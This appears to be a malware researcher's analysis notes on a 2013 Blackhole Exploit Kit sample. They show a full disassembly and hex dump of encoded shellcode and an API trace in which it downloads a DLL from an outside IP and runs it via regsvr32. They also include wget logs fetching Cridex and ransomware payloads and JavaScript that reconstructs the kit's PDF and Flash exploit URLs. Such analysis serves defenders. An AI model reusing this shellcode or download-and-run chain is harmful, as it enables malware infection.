000001A4 125807 adc bl,[eax+0x7]
000001A7 07 pop es
000001A8 1E push ds
000001A9 1C19 sbb al,0x19
000001AB 06 push es
000001AC 1D1F1A061C sbb eax,0x1c061a1f
000001B1 1A1A sbb bl,[edx]
000001B3 06 push es
000001B4 1219 adc bl,[ecx]
000001B6 1810 sbb [eax],dl
000001B8 1810 sbb [eax],dl
000001BA 4E dec esi
000001BB 07 pop es
000001BC 5A pop edx
000001BD 47 inc edi
000001BE 45 inc ebp
000001BF 5D pop ebp
000001C0 44 inc esp
000001C1 07 pop es
000001C2 46 inc esi
000001C3 41 inc ecx
000001C4 5B pop ebx
000001C5 43 inc ebx
000001C6 58 pop eax
000001C7 07 pop es
000001C8 4A dec edx
000001C9 5D pop ebp
000001CA 41 inc ecx
000001CB 44 inc esp
000001CC 774B ja 0x219
000001CE 4D dec ebp
000001CF 5E pop esi
000001D0 5B pop ebx
000001D1 5A pop edx
000001D2 47 inc edi
000001D3 41 inc ecx
000001D4 06 push es
000001D5 46 inc esi
000001D6 40 inc eax
000001D7 58 pop eax
000001D8 17 pop ss
000001D9 58 pop eax
000001DA 4E dec esi
000001DB 5C pop esp
000001DC 1B1512184619 sbb edx,[dword 0x19461812]
000001E2 1912 sbb [edx],edx
000001E4 124141 adc al,[ecx+0x41]
000001E7 191B sbb [ebx],ebx
000001E9 120E adc cl,[esi]
000001EB 1B4D5F sbb ecx,[ebp+0x5f]
000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
000001F4 1912 sbb [edx],edx
000001F6 12451A adc al,[ebp+0x1a]
000001F9 1B1B sbb ebx,[ebx]
000001FB 1212 adc dl,[edx]
000001FD 1B4319 sbb eax,[ebx+0x19]
00000200 1912 sbb [edx],edx
00000202 124319 adc al,[ebx+0x19]
00000205 1B19 sbb ebx,[ecx]
00000207 1212 adc dl,[edx]
00000209 42 inc edx
0000020A 47 inc edi
0000020B 19590E sbb [ecx+0xe],ebx
0000020E 19150E434045 sbb [dword 0x4540430e],edx
00000214 58 pop eax
00000215 155E0E155E adc eax,0x5e150e5e
0000021A 285A00 sub [edx+0x0],bl ; math
0000021D 28 db 0x28
// gathered blocks of API..
blocks.. translation..
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
// same one.... different code.. in url parts.. two time...
// raws..
414141418366fce4ebfc5810c931816603e980fe2830e240ebfae805ffebffffccad1c5d77c1e81ba34c186868a3a3243458a37e205ef31ba34e14765c2b041bc6a9383dd7d7a39018686eeb2e11d35d1cafad0c5dccc17964c37e795da3a3141d5c2b507edd5ea32b081bdd61e1d4692b851bed27f33896da10205ce3e92b2568f2d9c33713ce5da3760c76f52ba34e63246ea5d7c40c7ca3242bf0a3f5a32ced2b7683eb717bc3a385084055a81b242b5cc3bea3db2040dfa32d42c071d7b0d7d7d1ca28c0282870284278406828d72828ab7831e87d78c4a376a3ab382debcbd74740284640285a5d4544d77cab3e20ecc0a349c0d7d7c3d7c32aa95a2cc42829a5280c74ef240c2c4d5a5b4f6cef2c0c5a5e1a1b6cef200c0508085b407b28d028287ed7a3241bc079e16cef2835585f5c4a6cef2d354c0644446cee21357128e9a2182c6ca02c357969284228427f7b28427ed7ad3c5de8423e7b287ed7422cab2824c3d77b2c7eebabc324c32a6f3b17a85d286fd217a85d2842ec4228d7d6207eb4c0d7d6a6d72666b0c4a2d6a12629471b95a2e233736eee1e51073240585c5c125807071e1c19061d1f1a061c1a1a061219181018104e075a47455d440746415b4358074a5d4144774b4d5e5b5a47410646405817584e5c1b15121846191912124141191b120e1b4d5f1a15125e4319191212451a1b1b12121b431919121243191b191212424719590e19150e43404558155e0e155e285a0028
// view...
41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 AAAAf......X1.f.
e9 03 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff ....0(@.........
ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1 c3 64 79 7e a3 5d 14 a3 .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e 08 2b dd 1b e1 61 69 d4 \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38 10 da 5c 20 e9 e3 25 2b .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce 76 a3 76 0c 2b f5 4e a3 .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c 24 a3 f0 2b f5 a3 2c a3 $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b 85 a3 40 08 a8 55 24 1b +..vq..{..@..U$.
5c 2b be c3 db a3 40 20 a3 df 42 2d 71 c0 b0 d7 \+....@...B-q...
d7 d7 ca d1 c0 28 28 28 28 70 78 42 68 40 d7 28 .....((((pxBh@.(
28 28 78 ab e8 31 78 7d a3 c4 a3 76 38 ab eb 2d ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40 5d 5a 44 45 7c d7 3e ab ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7 d7 c3 2a c3 5a a9 c4 2c .....I....*.Z..,
29 28 28 a5 74 0c 24 ef 2c 0c 5a 4d 4f 5b ef 6c )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c 0c 20 08 05 5b 08 7b 40 .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3 c0 1b e1 79 ef 6c 35 28 .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d 06 4c 44 44 ee 6c 35 21 _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c 35 2c 69 79 42 28 42 28 (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad e8 5d 3e 42 28 7b d7 7e {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7 7e 2c ab eb 24 c3 2a c3 ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f a8 17 28 5d ec 42 28 42 ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7 d7 a6 66 26 c4 b0 d6 a2 ..~.......f&....
26 a1 47 29 95 1b e2 a2 73 33 ee 6e 51 1e 32 07 &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07 1c 1e 06 19 1f 1d 06 1a X@\\X...........
1a 1c 06 1a 19 12 10 18 10 18 07 4e 47 5a 5d 45 ...........NGZ]E
07 44 41 46 43 5b 07 58 5d 4a 44 41 4b 77 5e 4d .DAFC[.X]JDAKw^M
5a 5b 41 47 46 06 58 40 58 17 46 4e 15 19 40 12 Z[AGF.X@X.FN..@.
19 42 12 19 42 12 1b 1a 12 19 4e 0e 42 4d 15 19 .B..B.....N.BM..
42 12 1b 1b 12 1b 1a 12 19 44 12 19 4f 12 19 41 B........D..O..A
12 19 47 12 19 46 12 19 47 12 19 41 0e 5c 15 19 ..G..F..G..A.\..
43 0e 47 51 15 58 0e 42 40 15 41 28 28 00 C.GQ.X.B@.A((.
//disasm...
00000000 41 inc ecx
00000001 41 inc ecx
00000002 41 inc ecx
00000003 41 inc ecx
00000004 8366FCE4 and dword [esi-0x4],byte -0x1c
00000008 EBFC jmp short 0x6 ; loop
0000000A 58 pop eax
0000000B 10C9 adc cl,cl
0000000D 31816603E980 xor [ecx-0x7f16fc9a],eax ; decryption
00000013 FE db 0xfe
00000014 2830 sub [eax],dh ; math
00000016 E240 loop 0x58 ; loop
00000018 EBFA jmp short 0x14 ; loop
0000001A E805FFEBFF call dword 0xffebff24 ; call
0000001F FFCC dec esp
00000021 AD lodsd
00000022 1C5D sbb al,0x5d
00000024 77C1 ja 0xffffffe7
00000026 E81BA34C18 call dword 0x184ca346 ; call
0000002B 6868A3A324 push dword 0x24a3a368
00000030 3458 xor al,0x58 ; decryption
00000032 A37E205EF3 mov [0xf35e207e],eax
00000037 1BA34E14765C sbb esp,[ebx+0x5c76144e]
0000003D 2B041B sub eax,[ebx+ebx] ; math
00000040 C6 db 0xc6
00000041 A9383DD7D7 test eax,0xd7d73d38
00000046 A39018686E mov [0x6e681890],eax
0000004B EB2E jmp short 0x7b ; loop
0000004D 11D3 adc ebx,edx
0000004F 5D pop ebp
00000050 1CAF sbb al,0xaf
00000052 AD lodsd
00000053 0C5D or al,0x5d
00000055 CC int3
00000056 C17964C3 sar dword [ecx+0x64],0xc3
0000005A 7E79 jng 0xd5
0000005C 5D pop ebp
0000005D A3A3141D5C mov [0x5c1d14a3],eax
00000062 2B507E sub edx,[eax+0x7e] ; math
00000065 DD5EA3 fstp qword [esi-0x5d]
00000068 2B08 sub ecx,[eax] ; math
0000006A 1BDD sbb ebx,ebp
0000006C 61 popad
0000006D E1D4 loope 0x43
0000006F 692B851BED27 imul ebp,[ebx],dword 0x27ed1b85
00000075 F33896DA10205C rep cmp [esi+0x5c2010da],dl
0000007C E3E9 jecxz 0x67
0000007E 2B2568F2D9C3 sub esp,[dword 0xc3d9f268] ; math
00000084 37 aaa
00000085 13CE adc ecx,esi
00000087 5D pop ebp
00000088 A3760C76F5 mov [0xf5760c76],eax
0000008D 2BA34E63246E sub esp,[ebx+0x6e24634e] ; math
00000093 A5 movsd
00000094 D7 xlatb
00000095 C40C7C les ecx,[esp+edi*2]
00000098 A3242BF0A3 mov [0xa3f02b24],eax
0000009D F5 cmc
0000009E A32CED2B76 mov [0x762bed2c],eax
000000A3 83EB71 sub ebx,byte +0x71 ; math
000000A6 7BC3 jpo 0x6b
000000A8 A385084055 mov [0x55400885],eax
000000AD A81B test al,0x1b
000000AF 242B and al,0x2b
000000B1 5C pop esp
000000B2 C3 ret
000000B3 BEA3DB2040 mov esi,0x4020dba3
000000B8 DFA32D42C071 fbld tword [ebx+0x71c0422d]
000000BE D7 xlatb
000000BF B0D7 mov al,0xd7
000000C1 D7 xlatb
000000C2 D1CA ror edx,1 ; bitwise cipher
000000C4 28C0 sub al,al ; math
000000C6 2828 sub [eax],ch ; math
000000C8 7028 jo 0xf2
000000CA 42 inc edx
000000CB 7840 js 0x10d
000000CD 6828D72828 push dword 0x2828d728
000000D2 AB stosd
000000D3 7831 js 0x106
000000D5 E87D78C4A3 call dword 0xa3c47957 ; call
000000DA 76A3 jna 0x7f
000000DC AB stosd
000000DD 382DEBCBD747 cmp [dword 0x47d7cbeb],ch
000000E3 40 inc eax
000000E4 284640 sub [esi+0x40],al ; math
000000E7 285A5D sub [edx+0x5d],bl ; math
000000EA 45 inc ebp
000000EB 44 inc esp
000000EC D7 xlatb
000000ED 7CAB jl 0x9a
000000EF 3E20EC ds and ah,ch
000000F2 C0A349C0D7D7C3 shl byte [ebx-0x28283fb7],0xc3
000000F9 D7 xlatb
000000FA C3 ret
000000FB 2AA95A2CC428 sub ch,[ecx+0x28c42c5a] ; math
00000101 29A5280C74EF sub [ebp-0x108bf3d8],esp ; math
00000107 240C and al,0xc
00000109 2C4D sub al,0x4d ; math
0000010B 5A pop edx
0000010C 5B pop ebx
0000010D 4F dec edi
0000010E 6C insb
0000010F EF out dx,eax
00000110 2C0C sub al,0xc ; math
00000112 5A pop edx
00000113 5E pop esi
00000114 1A1B sbb bl,[ebx]
00000116 6C insb
00000117 EF out dx,eax
00000118 200C0508085B40 and [eax+0x405b0808],cl
0000011F 7B28 jpo 0x149
00000121 D028 shr byte [eax],1
00000123 287ED7 sub [esi-0x29],bh ; math
00000126 A3241BC079 mov [0x79c01b24],eax
0000012B E16C loope 0x199
0000012D EF out dx,eax
0000012E 2835585F5C4A sub [dword 0x4a5c5f58],dh ; math
00000134 6C insb
00000135 EF out dx,eax
00000136 2D354C0644 sub eax,0x44064c35 ; math
0000013B 44 inc esp
0000013C 6C insb
0000013D EE out dx,al
0000013E 21357128E9A2 and [dword 0xa2e92871],esi
00000144 182C6C sbb [esp+ebp*2],ch
00000147 A02C357969 mov al,[0x6979352c]
0000014C 284228 sub [edx+0x28],al ; math
0000014F 42 inc edx
00000150 7F7B jg 0x1cd
00000152 28427E sub [edx+0x7e],al ; math
00000155 D7 xlatb
00000156 AD lodsd
00000157 3C5D cmp al,0x5d
00000159 E8423E7B28 call dword 0x287b3fa0 ; call
0000015E 7ED7 jng 0x137
00000160 42 inc edx
00000161 2CAB sub al,0xab ; math
00000163 2824C3 sub [ebx+eax*8],ah ; math
00000166 D7 xlatb
00000167 7B2C jpo 0x195
00000169 7EEB jng 0x156
0000016B AB stosd
0000016C C3 ret
0000016D 24C3 and al,0xc3
0000016F 2A6F3B sub ch,[edi+0x3b] ; math
00000172 17 pop ss
00000173 A85D test al,0x5d
00000175 286FD2 sub [edi-0x2e],ch ; math
00000178 17 pop ss
00000179 A85D test al,0x5d
0000017B 2842EC sub [edx-0x14],al ; math
0000017E 42 inc edx
0000017F 28D7 sub bh,dl ; math
00000181 D6 salc
00000182 207EB4 and [esi-0x4c],bh
00000185 C0D7D6 rcl bh,0xd6
00000188 A6 cmpsb
00000189 D7 xlatb
0000018A 2666B0C4 es o16 mov al,0xc4
0000018E A2D6A12629 mov [0x2926a1d6],al
00000193 47 inc edi
00000194 1B95A2E23373 sbb edx,[ebp+0x7333e2a2]
0000019A 6E outsb
0000019B EE out dx,al
0000019C 1E push ds
0000019D 51 push ecx
0000019E 07 pop es
0000019F 324058 xor al,[eax+0x58] ; decryption
000001A2 5C pop esp
000001A3 5C pop esp
000001A4 125807 adc bl,[eax+0x7]
000001A7 07 pop es
000001A8 1E push ds
000001A9 1C19 sbb al,0x19
000001AB 06 push es
000001AC 1D1F1A061C sbb eax,0x1c061a1f
000001B1 1A1A sbb bl,[edx]
000001B3 06 push es
000001B4 1219 adc bl,[ecx]
000001B6 1810 sbb [eax],dl
000001B8 1810 sbb [eax],dl
000001BA 4E dec esi
000001BB 07 pop es
000001BC 5A pop edx
000001BD 47 inc edi
000001BE 45 inc ebp
000001BF 5D pop ebp
000001C0 44 inc esp
000001C1 07 pop es
000001C2 46 inc esi
000001C3 41 inc ecx
000001C4 5B pop ebx
000001C5 43 inc ebx
000001C6 58 pop eax
000001C7 07 pop es
000001C8 4A dec edx
000001C9 5D pop ebp
000001CA 41 inc ecx
000001CB 44 inc esp
000001CC 774B ja 0x219
000001CE 4D dec ebp
000001CF 5E pop esi
000001D0 5B pop ebx
000001D1 5A pop edx
000001D2 47 inc edi
000001D3 41 inc ecx
000001D4 06 push es
000001D5 46 inc esi
000001D6 40 inc eax
000001D7 58 pop eax
000001D8 17 pop ss
000001D9 58 pop eax
000001DA 4E dec esi
000001DB 5C pop esp
000001DC 1B1512184619 sbb edx,[dword 0x19461812]
000001E2 1912 sbb [edx],edx
000001E4 124141 adc al,[ecx+0x41]
000001E7 191B sbb [ebx],ebx
000001E9 120E adc cl,[esi]
000001EB 1B4D5F sbb ecx,[ebp+0x5f]
000001EE 1A15125E4319 sbb dl,[dword 0x19435e12]
000001F4 1912 sbb [edx],edx
000001F6 12451A adc al,[ebp+0x1a]
000001F9 1B1B sbb ebx,[ebx]
000001FB 1212 adc dl,[edx]
000001FD 1B4319 sbb eax,[ebx+0x19]
00000200 1912 sbb [edx],edx
00000202 124319 adc al,[ebx+0x19]
00000205 1B19 sbb ebx,[ecx]
00000207 1212 adc dl,[edx]
00000209 42 inc edx
0000020A 47 inc edi
0000020B 19590E sbb [ecx+0xe],ebx
0000020E 19150E434045 sbb [dword 0x4540430e],edx
00000214 58 pop eax
00000215 155E0E155E adc eax,0x5e150e5e
0000021A 285A00 sub [edx+0x0],bl ; math
0000021D 28 db 0x28
//translating API..
blocks.... translation...
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
//============================
// PAYLOADS GOES FIRST...
//============================
// fetch these sh*ts...
--2013-02-18 15:08:46-- h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r http/1.0
Host: 46.175.224.21:8080
http request sent, awaiting response...
:
http/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 06:08:39 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Mon, 18 Feb 2013 06:08:39 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="about.exe"
Content-Transfer-Encoding: binary
Content-Length: 94208
:
200 OK
Length: 94208 (92K) [application/x-msdownload]
Saving to: `./about.exe'
2013-02-18 15:08:48 (59.5 KB/s) - `./about.exe' saved [94208/94208]
--2013-02-18 15:07:55-- h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i
seconds 0.00, Connecting to 46.175.224.21:8080... seconds 0.00, connected.
:
GET /forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i http/1.0
Host: 46.175.224.21:8080
http request sent, awaiting response...
:
h00p/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 18 Feb 2013 06:07:48 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Mon, 18 Feb 2013 06:07:48 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme.exe"
Content-Transfer-Encoding: binary
Content-Length: 279040
:
200 OK
Length: 279040 (273K) [application/x-msdownload]
Saving to: `./readme.exe'
2013-02-18 15:08:00 (70.7 KB/s) - `./readme.exe' saved [279040/279040]
//Payloads checks...Cridex & ransomware....
https://www.virustotal.com/ja/file/bea956049c02eefa07495dda55a1624ba3fe4020ed268094f7b63ec53439d48d/analysis/1361171081/
https://www.virustotal.com/ja/file/5050a5bdf164767ba6a8432a273942983737b3553c2f0d8fdbab42bbdaab3f6e/analysis/1361171101/
=============CRACK LOGIC FOR PDF URL==================
function x(s){
d = [];
for (i = 0; i < s.length; i ++ ){
k = (s.charCodeAt(i)).toString(33);
d.push(k);
}
;
return d.join(":");
}
var domain="h00p://46.175.224.21:8080";
var pdf ="1k:1d:1f:1d:1g:1d:1f";
var string1 ="/forum/links/public_version.php?tzpiqxci=" + x("244e0") + "&rqoddrzb=" + x("bpc") + "&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=";
var string2 ="/forum/links/public_version.php?iitxovwc=" + x("244e0") + "&hic=" + x("c") + "&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=" ;
var string3 ="/forum/links/public_version.php?hysb=" + x("c833f") + "&togkor=" + x("oyt") + "&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=";
var string4 ="/forum/links/public_version.php?myedivup=" + x("c833f") + ">aaynbu=" + x("h") + "&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=";
var url1 = domain + string1 + pdf;
var url2 = domain + string2 + pdf;
var url3 = domain + string3 + pdf;
var url4 = domain + string4 + pdf;
document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
// output:
h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33>aaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
//=============CRACK LOGIC FOR SWF URL==================
function x(s){
d = [];
for (i = 0; i < s.length; i ++ ){
k = (s.charCodeAt(i)).toString(33);
d.push(k);
}
;
return d.join(":");
}
var domain="h00p://46.175.224.21:8080";
var url1 = domain + "/forum/links/public_version.php?jwio=" + x("244e0") + "&xnrj=" + x("nxjmw") + "&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg";
var url2 = domain + "/forum/links/public_version.php?ecxrx=" + x("244e0") + "&pihpkcv=" + x("tlil") + "&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda";
var url3 = domain + "/forum/links/public_version.php?jsehhtfz=" + x("c833f") + "&rrhjmwf=" + x("eomsp") + "&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms";
var url4 = domain + "/forum/links/public_version.php?efoo=" + x("c833f") + "&bpsmrsqj=" + x("wdrh") + "&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx";
document.write(url1 + "\n" + url2+ "\n" + url3 + "\n" + url4);
// output
h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
//=============LET's FLUSH THEM (4 PDF + 4 SWF) ALL!!! =============
//pdf
--2013-02-18 15:50:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?tzpiqxci=1h:1j:1j:32:1f&rqoddrzb=2w:3d:30&gejepm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&ifsrn=1k:1d:1f:1d:1g:1d:1f
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 20161 (20K) [application/pdf]
Saving to: `./pdf1.pdf'
100%[==============================================================================>] 20,161 32.3K/s in 0.6s
2013-02-18 15:50:24 (32.3 KB/s) - `./pdf1.pdf' saved [20161/20161]
--2013-02-18 15:50:53-- h00p://46.175.224.21:8080/forum/links/public_version.php?iitxovwc=1h:1j:1j:32:1f&hic=30&ztm=1j:33:32:1l:1g:1i:1o:1n:1o:1i&dremyj=1k:1d:1f:1d:1g:1d:1f
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 11194 (11K) [application/pdf]
Saving to: `./pdf2.pdf'
100%[==============================================================================>] 11,194 32.5K/s in 0.3s
2013-02-18 15:50:54 (32.5 KB/s) - `./pdf2.pdf' saved [11194/11194]
--2013-02-18 15:51:22-- h00p://46.175.224.21:8080/forum/links/public_version.php?hysb=30:1n:1i:1i:33&togkor=3c:3m:3h&wafox=2v:1k:1m:32:33:1k:1k:31:1j:1o&wdnxc=1k:1d:1f:1d:1g:1d:1f
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 20161 (20K) [application/pdf]
Saving to: `./pdf3.pdf'
100%[==============================================================================>] 20,161 31.6K/s in 0.6s
2013-02-18 15:51:24 (31.6 KB/s) - `./pdf3.pdf' saved [20161/20161]
--2013-02-18 15:52:02-- h00p://46.175.224.21:8080/forum/links/public_version.php?myedivup=30:1n:1i:1i:33>aaynbu=35&kxqcms=2v:1k:1m:32:33:1k:1k:31:1j:1o&oiqkk=1k:1d:1f:1d:1g:1d:1f
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 11160 (11K) [application/pdf]
Saving to: `./pdf4.pdf'
100%[==============================================================================>] 11,160 34.6K/s in 0.3s
2013-02-18 15:52:03 (34.6 KB/s) - `./pdf4.pdf' saved [11160/11160]
// flash....
--2013-02-18 15:54:34-- h00p://46.175.224.21:8080/forum/links/public_version.php?jwio=1h:1j:1j:32:1f&xnrj=3b:3l:37:3a:3k&ehn=1j:33:32:1l:1g:1i:1o:1n:1o:1i&fxqbltpx=cbfyrfg
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 7981 (7.8K) [text/html]
Saving to: `./flash1.swf'
100%[==============================================================================>] 7,981 26.7K/s in 0.3s
2013-02-18 15:54:36 (26.7 KB/s) - `./flash1.swf' saved [7981/7981]
--2013-02-18 15:54:58-- h00p://46.175.224.21:8080/forum/links/public_version.php?ecxrx=1h:1j:1j:32:1f&pihpkcv=3h:39:36:39&tlouh=1j:33:32:1l:1g:1i:1o:1n:1o:1i&cuchmcv=bda
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 1030 (1.0K) [text/html]
Saving to: `./flash2.swf'
100%[==============================================================================>] 1,030 --.-K/s in 0s
2013-02-18 15:54:59 (35.5 MB/s) - `./flash2.swf' saved [1030/1030]
--2013-02-18 15:55:14-- h00p://46.175.224.21:8080/forum/links/public_version.php?jsehhtfz=30:1n:1i:1i:33&rrhjmwf=32:3c:3a:3g:3d&ggrjtm=2v:1k:1m:32:33:1k:1k:31:1j:1o&vpx=mcms
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 7981 (7.8K) [text/html]
Saving to: `./flash3.swf'
100%[==============================================================================>] 7,981 25.5K/s in 0.3s
2013-02-18 15:55:15 (25.5 KB/s) - `./flash3.swf' saved [7981/7981]
--2013-02-18 15:57:54-- h00p://46.175.224.21:8080/forum/links/public_version.php?efoo=30:1n:1i:1i:33&bpsmrsqj=3k:31:3f:35&sokgxr=2v:1k:1m:32:33:1k:1k:31:1j:1o&engay=zhpldpx
Connecting to 46.175.224.21:8080... connected.
h00p request sent, awaiting response... 200 OK
Length: 1030 (1.0K) [text/html]
Saving to: `./flash4.swf'
100%[==============================================================================>] 1,030 --.-K/s in 0s
2013-02-18 15:57:55 (36.2 MB/s) - `./flash4.swf' saved [1030/1030]
=========================
It has Geo-IP functions built in in BHEK...
Reference: http://ondailybasis.com/blog/?p=1483
=======================-
----
#MalwareMustDie | @unixfreaxjp